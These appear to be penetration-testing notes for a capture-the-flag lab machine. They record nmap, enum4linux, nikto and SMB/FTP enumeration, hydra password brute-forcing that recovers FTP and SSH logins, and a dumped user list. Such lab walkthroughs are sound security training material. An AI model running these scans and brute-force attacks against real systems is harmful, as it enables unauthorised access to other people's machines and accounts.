192.168.1.92

DATOS
Posibles usuarios ftp
harry
elly
john
kathy
fred

nmap -sS 192.168.1.92
  PORT     STATE  SERVICE
  20/tcp   closed ftp-data
  21/tcp   open   ftp
  22/tcp   open   ssh
  53/tcp   open   domain
  80/tcp   open   http
  139/tcp  open   netbios-ssn
  666/tcp  open   doom
  3306/tcp open   mysql
  
nmap -sV -O -Pn 192.168.1.92 -p20,21,22,53,80,139,666,3306
  PORT     STATE  SERVICE     VERSION
  20/tcp   closed ftp-data
  21/tcp   open   ftp         vsftpd 2.0.8 or later
  22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  53/tcp   open   domain      dnsmasq 2.75
  80/tcp   open   http        PHP cli server 5.5 or later
  139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  666/tcp  open   doom?
  3306/tcp open   mysql       MySQL 5.7.12-0ubuntu1

ftp 192.168.1.92
anonymous:[en blanco]

dir
get note

cat note
  Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
  
smbclient -L //192.168.1.92
  print$          Disk      Printer Drivers
  kathy           Disk      Fred, What are we doing here?
  tmp             Disk      All temporary files should be stored here
  IPC$            IPC       IPC Service (red server (Samba, Ubuntu))

enum4linux -U -M -S -P -G -d -r -l -o -i -n 192.168.1.92
[+] Server 192.168.1.92 allows sessions using username '', password ''
[+] Attempting to map shares on 192.168.1.92
//192.168.1.92/print$   Mapping: DENIED, Listing: N/A
//192.168.1.92/kathy    Mapping: OK, Listing: OK
//192.168.1.92/tmp      Mapping: OK, Listing: OK
//192.168.1.92/IPC$     [E] Can't understand response:
[+] Found domain(s):

        [+] RED
        [+] Builtin
        
S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User)

nmap --script smb-vuln* -p 139 192.168.1.92
VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service

smbclient \\\\192.168.1.92\\kathy -U ""
ls
.                                   D        0  Fri Jun  3 12:52:52 2016
..                                  D        0  Mon Jun  6 17:39:56 2016
kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016
backup                              D        0  Sun Jun  5 11:04:14 2016

cd kathy_stuff
get todo-list.txt
I'm making sure to backup anything important for Initech, Kathy

get wordpress-4.tar.gz


nmap -sU -v 192.168.1.92
  PORT    STATE SERVICE
  53/udp  open  domain
  137/udp open  netbios-ns

smbclient \\\\192.168.1.92\\tmp -U ""
total 12.0K
drwxrwxrwt  2 root root 4.0K Jun  5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..
-rw-r--r--  1 root root    0 Jun  5 16:32 ls
drwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ

hydra -l elly -e nsr ftp://192.168.1.92 -v
  [21][ftp] host: 192.168.1.92   login: elly   password: ylle

wget -m --no-passive ftp://elly:ylle@192.168.1.92

/host
  127.0.1.1       red red.initech
  
/apache2/sites-enabled/
  <VirtualHost _default_:12380>
                ServerAdmin garry@red
                
http://192.168.1.92:12380/
  Server: Apache/2.4.18 (Ubuntu)
  Dave: Soemthing doesn't look right here
  <!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
  
nikto -h http://192.168.1.92:12380/
  /admin112233/
  /blogblog/
  /phpmyadmin/

peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash

peter
RNunemaker
ETollefson
DSwanger
AParnell
SHayslett
MBassin
JBare
LSolum
MFrei
SStroud
CCeaser
JKanode
CJoo
JLipps
jamie
Sam
Drew
jess
SHAY
Taylor
mel
kai
zoe
NATHAN
elly

hydra -L users.txt -e nsr ssh://192.168.1.92 -v
  [22][ssh] host: 192.168.1.92   login: SHayslett   password: SHayslett

cat /proc/version
  Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
  
